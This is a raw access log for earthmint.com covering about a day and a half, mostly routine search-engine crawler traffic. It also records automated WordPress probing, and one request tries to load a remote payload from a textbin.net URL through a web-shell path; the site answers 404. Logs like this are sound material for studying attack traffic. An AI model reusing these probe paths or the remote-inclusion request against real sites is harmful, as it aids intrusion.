51.222.253.16 - - [05/Sep/2022:20:41:02 -0700] "GET / HTTP/1.1" 200 379 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "www.earthmint.com"
114.119.144.229 - - [05/Sep/2022:20:45:14 -0700] "GET /index_files?S=A HTTP/1.1" 301 1414 "http://earthmint.com/index_files?M=A" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "earthmint.com"
114.119.144.229 - - [05/Sep/2022:20:45:17 -0700] "GET /index_files/?S=A HTTP/1.1" 200 314 "http://earthmint.com/index_files?M=A" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "earthmint.com"
114.119.129.36 - - [05/Sep/2022:20:51:37 -0700] "GET /images?C=D%3BO%3DA HTTP/1.1" 301 1418 "http://earthmint.com/images?S=D" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "earthmint.com"
114.119.129.36 - - [05/Sep/2022:20:51:42 -0700] "GET /images/?C=D%3BO%3DA HTTP/1.1" 200 311 "http://earthmint.com/images?S=D" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "earthmint.com"
118.184.177.87 - - [05/Sep/2022:20:59:38 -0700] "GET / HTTP/1.1" 200 379 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "earthmint.com"
20.169.38.167 - - [05/Sep/2022:21:25:34 -0700] "GET / HTTP/1.1" 200 849 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "earthmint.com"
20.169.38.167 - - [05/Sep/2022:21:25:34 -0700] "GET / HTTP/1.1" 200 849 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "earthmint.com"
20.169.38.167 - - [05/Sep/2022:21:25:34 -0700] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "earthmint.com"
20.169.38.167 - - [05/Sep/2022:21:25:35 -0700] "GET /xmlrpc.php?rsd HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "earthmint.com"
20.169.38.167 - - [05/Sep/2022:21:25:35 -0700] "GET / HTTP/1.1" 200 849 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "earthmint.com"
20.169.38.167 - - [05/Sep/2022:21:25:35 -0700] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "earthmint.com"
20.169.38.167 - - [05/Sep/2022:21:25:35 -0700] "GET /web/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "earthmint.com"
20.169.38.167 - - [05/Sep/2022:21:25:35 -0700] "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "earthmint.com"
20.169.38.167 - - [05/Sep/2022:21:25:35 -0700] "GET /website/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "earthmint.com"
20.169.38.167 - - [05/Sep/2022:21:25:35 -0700] "GET /news/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "earthmint.com"
20.169.38.167 - - [05/Sep/2022:21:25:35 -0700] "GET /2020/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "earthmint.com"
20.169.38.167 - - [05/Sep/2022:21:25:35 -0700] "GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "earthmint.com"
20.169.38.167 - - [05/Sep/2022:21:25:35 -0700] "GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "earthmint.com"
20.169.38.167 - - [05/Sep/2022:21:25:36 -0700] "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "earthmint.com"
20.169.38.167 - - [05/Sep/2022:21:25:36 -0700] "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "earthmint.com"
20.169.38.167 - - [05/Sep/2022:21:25:36 -0700] "GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "earthmint.com"
20.169.38.167 - - [05/Sep/2022:21:25:36 -0700] "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "earthmint.com"
20.169.38.167 - - [05/Sep/2022:21:25:36 -0700] "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "earthmint.com"
20.169.38.167 - - [05/Sep/2022:21:25:36 -0700] "GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "earthmint.com"
123.125.109.128 - - [05/Sep/2022:21:33:03 -0700] "GET / HTTP/1.1" 200 379 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.earthmint.com"
114.119.144.222 - - [05/Sep/2022:21:45:11 -0700] "GET /images?D=D HTTP/1.1" 301 1413 "https://earthmint.com/images?D=A" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "earthmint.com"
114.119.144.222 - - [05/Sep/2022:21:45:15 -0700] "GET /images/?D=D HTTP/1.1" 200 311 "https://earthmint.com/images?D=A" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "earthmint.com"
114.119.144.229 - - [05/Sep/2022:21:50:53 -0700] "GET /images/?C=S%3BO%3DA HTTP/1.1" 200 311 "http://earthmint.com/images?N=A" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "earthmint.com"
114.119.144.229 - - [05/Sep/2022:21:56:25 -0700] "GET /?C=M%3BO%3DA HTTP/1.1" 200 379 "https://earthmint.com?C=N%3BO%3DD" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "earthmint.com"
51.222.253.7 - - [05/Sep/2022:22:26:50 -0700] "GET / HTTP/1.1" 200 379 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "earthmint.com"
54.36.149.86 - - [05/Sep/2022:22:39:54 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "www.earthmint.com"
162.55.85.227 - - [06/Sep/2022:00:00:32 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "earthmint.com"
162.55.85.227 - - [06/Sep/2022:00:00:32 -0700] "GET / HTTP/1.1" 200 379 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "earthmint.com"
34.170.194.177 - - [06/Sep/2022:00:17:58 -0700] "GET / HTTP/1.1" 200 379 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" "earthmint.com"
34.170.194.177 - - [06/Sep/2022:00:18:04 -0700] "GET /favicon.ico HTTP/1.1" 404 88 "http://earthmint.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" "earthmint.com"
45.32.150.83 - - [06/Sep/2022:00:21:50 -0700] "GET / HTTP/1.1" 200 379 "-" "Mozilla/5.0 (Macintosh;   Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML,   like Gecko) Chrome/50.0.2661.102 Safari/537.36" "earthmint.com"
54.158.159.194 - - [06/Sep/2022:00:34:12 -0700] "GET / HTTP/1.1" 200 379 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "earthmint.com"
23.100.7.152 - - [06/Sep/2022:00:35:53 -0700] "GET //wp-includes/customize/class-wp-customize-nav-menu.php?new HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36" "earthmint.com"
23.100.7.152 - - [06/Sep/2022:00:36:20 -0700] "GET //wp-content/themes/un.php?php=https://textbin.net/raw/k9bbqot3ml HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36" "earthmint.com"
23.100.7.152 - - [06/Sep/2022:00:36:49 -0700] "GET //wp-includes/customize/class-wp-customize-nav-menu.php?null=1 HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36" "earthmint.com"
162.55.85.227 - - [06/Sep/2022:01:31:55 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "earthmint.com"
162.55.85.227 - - [06/Sep/2022:01:31:56 -0700] "GET /sitemap HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "earthmint.com"
162.55.85.227 - - [06/Sep/2022:01:32:10 -0700] "GET /sitemap.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "earthmint.com"
162.55.85.227 - - [06/Sep/2022:01:33:09 -0700] "GET /?C=D;O=A HTTP/1.1" 200 379 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "earthmint.com"
162.55.85.227 - - [06/Sep/2022:01:33:36 -0700] "GET /?C=M;O=A HTTP/1.1" 200 380 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "earthmint.com"
162.55.85.227 - - [06/Sep/2022:01:33:52 -0700] "GET /?C=N;O=D HTTP/1.1" 200 378 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "earthmint.com"
162.55.85.227 - - [06/Sep/2022:01:34:21 -0700] "GET /?C=S;O=A HTTP/1.1" 200 379 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "earthmint.com"
162.55.85.227 - - [06/Sep/2022:01:34:38 -0700] "GET /_private/ HTTP/1.1" 403 170 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "earthmint.com"
162.55.85.227 - - [06/Sep/2022:01:35:12 -0700] "GET /images/ HTTP/1.1" 200 311 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "earthmint.com"
162.55.85.227 - - [06/Sep/2022:01:35:31 -0700] "GET /index_files/ HTTP/1.1" 200 314 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "earthmint.com"
123.125.109.128 - - [06/Sep/2022:02:06:36 -0700] "GET / HTTP/1.1" 200 379 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "earthmint.com"
95.163.255.158 - - [06/Sep/2022:02:46:06 -0700] "GET /robots.txt HTTP/1.1" 404 73 "-" "Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +https://help.mail.ru/webmaster/indexing/robots)" "www.earthmint.com"
95.163.255.155 - - [06/Sep/2022:02:46:22 -0700] "GET /tmp/ HTTP/1.1" 403 170 "-" "Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +https://help.mail.ru/webmaster/indexing/robots)" "www.earthmint.com"
51.222.253.11 - - [06/Sep/2022:03:54:17 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "earthmint.com"
51.222.253.14 - - [06/Sep/2022:03:54:18 -0700] "GET / HTTP/1.1" 200 379 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "earthmint.com"
61.135.159.129 - - [06/Sep/2022:03:54:33 -0700] "GET / HTTP/1.1" 200 379 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.earthmint.com"
138.197.173.124 - - [06/Sep/2022:05:18:45 -0700] "GET /wp-admin/install.php?step=1 HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "earthmint.com"
138.197.173.124 - - [06/Sep/2022:05:18:46 -0700] "GET /wp-admin/setup-config.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "earthmint.com"
138.197.173.124 - - [06/Sep/2022:05:18:46 -0700] "GET /new/wp-admin/install.php?step=1 HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "earthmint.com"
138.197.173.124 - - [06/Sep/2022:05:18:46 -0700] "GET /new/wp-admin/setup-config.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "earthmint.com"
138.197.173.124 - - [06/Sep/2022:05:18:46 -0700] "GET /blog/wp-admin/install.php?step=1 HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "earthmint.com"
138.197.173.124 - - [06/Sep/2022:05:18:47 -0700] "GET /blog/wp-admin/setup-config.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "earthmint.com"
138.197.173.124 - - [06/Sep/2022:05:18:47 -0700] "GET /blogs/wp-admin/install.php?step=1 HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "earthmint.com"
138.197.173.124 - - [06/Sep/2022:05:18:47 -0700] "GET /blogs/wp-admin/setup-config.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "earthmint.com"
138.197.173.124 - - [06/Sep/2022:05:18:47 -0700] "GET /demo/wp-admin/install.php?step=1 HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "earthmint.com"
138.197.173.124 - - [06/Sep/2022:05:18:48 -0700] "GET /demo/wp-admin/setup-config.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "earthmint.com"
138.197.173.124 - - [06/Sep/2022:05:18:48 -0700] "GET /wp/wp-admin/install.php?step=1 HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "earthmint.com"
138.197.173.124 - - [06/Sep/2022:05:18:48 -0700] "GET /wp/wp-admin/setup-config.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "earthmint.com"
138.197.173.124 - - [06/Sep/2022:05:18:48 -0700] "GET /wordpress/wp-admin/install.php?step=1 HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "earthmint.com"
138.197.173.124 - - [06/Sep/2022:05:18:49 -0700] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "earthmint.com"
138.197.173.124 - - [06/Sep/2022:05:18:49 -0700] "GET /tes/wp-admin/install.php?step=1 HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "earthmint.com"
138.197.173.124 - - [06/Sep/2022:05:18:49 -0700] "GET /tes/wp-admin/setup-config.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "earthmint.com"
138.197.173.124 - - [06/Sep/2022:05:18:50 -0700] "GET /test/wp-admin/install.php?step=1 HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "earthmint.com"
138.197.173.124 - - [06/Sep/2022:05:18:50 -0700] "GET /test/wp-admin/setup-config.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "earthmint.com"
138.197.173.124 - - [06/Sep/2022:05:18:50 -0700] "GET /web/wp-admin/install.php?step=1 HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "earthmint.com"
138.197.173.124 - - [06/Sep/2022:05:18:50 -0700] "GET /web/wp-admin/setup-config.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "earthmint.com"
138.197.173.124 - - [06/Sep/2022:05:18:50 -0700] "GET /cms/wp-admin/install.php?step=1 HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "earthmint.com"
138.197.173.124 - - [06/Sep/2022:05:18:51 -0700] "GET /cms/wp-admin/setup-config.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "earthmint.com"
138.197.173.124 - - [06/Sep/2022:05:18:51 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "earthmint.com"
138.197.173.124 - - [06/Sep/2022:05:18:52 -0700] "GET /wp-admin/ HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "earthmint.com"
34.210.83.47 - - [06/Sep/2022:05:26:04 -0700] "GET / HTTP/1.1" 200 379 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "earthmint.com"
35.89.199.152 - - [06/Sep/2022:05:26:05 -0700] "GET / HTTP/1.1" 200 379 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "earthmint.com"
35.85.221.118 - - [06/Sep/2022:05:26:28 -0700] "GET /favicon.ico HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "earthmint.com"
35.85.221.118 - - [06/Sep/2022:05:26:29 -0700] "GET / HTTP/1.1" 200 379 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "earthmint.com"
52.12.106.243 - - [06/Sep/2022:05:26:48 -0700] "GET /favicon.ico HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "earthmint.com"
52.12.106.243 - - [06/Sep/2022:05:26:54 -0700] "GET / HTTP/1.1" 200 379 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "earthmint.com"
118.184.177.87 - - [06/Sep/2022:05:55:35 -0700] "GET / HTTP/1.1" 200 379 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "earthmint.com"
216.244.66.203 - - [06/Sep/2022:06:03:38 -0700] "GET /robots.txt HTTP/1.1" 404 73 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "earthmint.com"
123.125.109.128 - - [06/Sep/2022:06:16:48 -0700] "GET / HTTP/1.1" 200 379 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.earthmint.com"
162.55.85.227 - - [06/Sep/2022:06:25:12 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "earthmint.com"
162.55.85.227 - - [06/Sep/2022:06:25:15 -0700] "GET /sitemap HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "earthmint.com"
162.55.85.227 - - [06/Sep/2022:06:25:21 -0700] "GET /sitemap.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "earthmint.com"
162.55.85.227 - - [06/Sep/2022:06:25:25 -0700] "GET /?C=D;O=D HTTP/1.1" 200 378 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "earthmint.com"
162.55.85.227 - - [06/Sep/2022:06:25:30 -0700] "GET /?C=M;O=D HTTP/1.1" 200 378 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "earthmint.com"
162.55.85.227 - - [06/Sep/2022:06:25:34 -0700] "GET /?C=N;O=A HTTP/1.1" 200 379 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "earthmint.com"
162.55.85.227 - - [06/Sep/2022:06:25:38 -0700] "GET /?C=S;O=D HTTP/1.1" 200 378 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "earthmint.com"
162.55.85.227 - - [06/Sep/2022:06:25:43 -0700] "GET /_private/ HTTP/1.1" 403 170 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "earthmint.com"
162.55.85.227 - - [06/Sep/2022:06:25:50 -0700] "GET /images/?C=D;O=A HTTP/1.1" 200 311 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "earthmint.com"
162.55.85.227 - - [06/Sep/2022:06:25:55 -0700] "GET /images/?C=M;O=A HTTP/1.1" 200 312 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "earthmint.com"
162.55.85.227 - - [06/Sep/2022:06:25:59 -0700] "GET /images/?C=N;O=D HTTP/1.1" 200 309 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "earthmint.com"
162.55.85.227 - - [06/Sep/2022:06:26:05 -0700] "GET /images/?C=S;O=A HTTP/1.1" 200 311 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "earthmint.com"
162.55.85.227 - - [06/Sep/2022:06:26:11 -0700] "GET /index_files/?C=D;O=A HTTP/1.1" 200 314 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "earthmint.com"
162.55.85.227 - - [06/Sep/2022:06:26:15 -0700] "GET /index_files/?C=M;O=A HTTP/1.1" 200 314 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "earthmint.com"
162.55.85.227 - - [06/Sep/2022:06:26:19 -0700] "GET /index_files/?C=N;O=D HTTP/1.1" 200 313 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "earthmint.com"
162.55.85.227 - - [06/Sep/2022:06:26:43 -0700] "GET /index_files/?C=S;O=A HTTP/1.1" 200 315 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "earthmint.com"
51.222.253.9 - - [06/Sep/2022:06:52:55 -0700] "GET / HTTP/1.1" 200 379 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "www.earthmint.com"
51.222.253.1 - - [06/Sep/2022:07:25:37 -0700] "GET /index_files/ HTTP/1.1" 200 314 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "earthmint.com"
91.242.162.23 - - [06/Sep/2022:07:42:39 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; Qwantify/2.4w; +https://www.qwant.com/)" "www.earthmint.com"
91.242.162.23 - - [06/Sep/2022:07:42:39 -0700] "GET /?D=A HTTP/1.1" 200 379 "-" "Mozilla/5.0 (compatible; Qwantify/2.4w; +https://www.qwant.com/)" "www.earthmint.com"
54.36.148.205 - - [06/Sep/2022:08:44:42 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "earthmint.com"
51.222.253.12 - - [06/Sep/2022:08:44:43 -0700] "GET / HTTP/1.1" 200 379 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "earthmint.com"
20.193.146.73 - - [06/Sep/2022:08:45:04 -0700] "GET / HTTP/1.1" 200 849 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4859.172 Safari/537.36" "earthmint.com"
202.131.224.26 - - [06/Sep/2022:10:10:37 -0700] "GET /wp-login.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "earthmint.com"
216.244.66.203 - - [06/Sep/2022:11:01:45 -0700] "GET /robots.txt HTTP/1.1" 404 73 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "earthmint.com"
114.119.144.212 - - [06/Sep/2022:11:28:09 -0700] "GET /index_files?S=A HTTP/1.1" 301 1419 "https://www.earthmint.com/index_files?M=D" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.earthmint.com"
